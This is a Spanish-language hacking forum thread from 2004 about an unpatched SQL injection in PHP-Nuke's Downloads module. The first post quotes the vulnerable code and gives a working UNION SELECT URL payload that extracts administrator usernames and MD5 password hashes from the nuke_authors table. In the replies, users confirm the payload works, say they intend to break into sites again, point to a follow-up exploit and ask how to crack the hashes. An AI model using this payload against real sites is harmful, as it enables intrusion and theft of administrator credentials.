Páginas: [1] 
|
 |
|
 Autor
|
Tema: Fallo phpnuke te permite ver los md5 de los admin (6-5-2004) (Leído 1499 veces)
|
|
el-brujo
|
Por DarkBicho Esta falla se encuentra en la variable orderby en las siguientes lineas de codigo en el index.php de donwload en la linea 901 $result=$db->sql_query("
SELECT lid, url, title, description, date, hits, downloadratingsummary, totalvotes,
totalcomments, filesize, version, homepage
FROM ".$prefix."_downloads_downloads
WHERE sid=$sid
order by $orderby
limit $min,$perpage
"); Mediante el siguiente querry se hace la peticion para obtener los md5 localhost/nuke72/modules.php?name=Downloads
&d_op=viewsdownload&sid=-1/**/UNION/**/SELECT/**/0,0,aid,pwd,0,0,0,0,0,0,0,0/**
/FROM/**/nuke_authors/**/WHERE/**/radminsuper=1/
**/LIMIT/**/1/* Hasta ahora no se ha sacado parche. http://www.net-security.org/vuln.php?id=3434Fuente: http://www.darkbicho.tk/ |
|
|
|
« Última modificación: 08 Mayo 2004, 06:12 por el-brujo »
|
En línea
|
Give peace a chance
|
|
|
Crack_X
Anti-War
Colaborador
 Desconectado
Mensajes: 2.324
Peace & Love
|
|
|
|
|
|
En línea
|
|
|
|
Mr_x
Desconectado
Mensajes: 2
|
como de sencripto los md5 o Clave Hash
|
|
|
|
|
En línea
|
|
|
|
Crack_X
Anti-War
Colaborador
Desconectado
Mensajes: 2.324
Peace & Love
|
|
|
|
|
|
En línea
|
|
|
|
oRTNZ
Desconectado
Mensajes: 814
no no soy malo... soy vicioso :p
|
ya lo probe devuelve infaltablemente el hash .... ahora sigue le segundo paso, aunque es mas complicado que el primer paso haber si logro penetrar a los php nuevamente  |
|
|
|
|
En línea
|
(31 del 12 de 2005) un dia que recuerdo siempre! :p
(03 del 08 de 2006) otro dia que lo recordare siempre...
Si eres Peruano, QUEDATE y si quieres ser de segunda mano del pais que fueras, pues LARGATE Y NO REGRESES...
|
|
|
Ambolius
Desconectado
Mensajes: 1.346
/España/Guadalajara
|
Para este segundo paso como dices tenermos el explot hecho por blade pegado en este mismo subforo...
|
|
|
|
|
En línea
|
Un informático a otro:
- ¿Cuantos eran los Dálmatas?
- 101.
- Por el culo te la hinco.
|
|
|
Rentero
Colaborador
Desconectado
Mensajes: 1.152
La paciencia es la madre de la ciencia.
|
|
|
|
|
|
En línea
|
Firmado.
|
|
|
oRTNZ
Desconectado
Mensajes: 814
no no soy malo... soy vicioso :p
|
gracias Ambolius, lo tengo bien recordado |
|
|
|
|
En línea
|
(31 del 12 de 2005) un dia que recuerdo siempre! :p
(03 del 08 de 2006) otro dia que lo recordare siempre...
Si eres Peruano, QUEDATE y si quieres ser de segunda mano del pais que fueras, pues LARGATE Y NO REGRESES...
|
|
|
Nuker
Desconectado
Mensajes: 18
|
eso solo sirve desde linux cierto?
|
|
|
|
|
En línea
|
|
|
|
aNexos
Registered Linux User: 354086
Desconectado
Mensajes: 4.457
¿Quieres saber?, toma tiempo para aprender.
|
supongo que con "desde" te refieres a que tu estas en una maquina con s.o. Linux.
Pues no, no solo sirve desde Linux, de hecho el S.O. que manejes no tiene que ver con eso. eso es cosa del portal.
|
|
|
|
|
En línea
|
|
|
|
|
Páginas: [1] 
|
|
|
 |
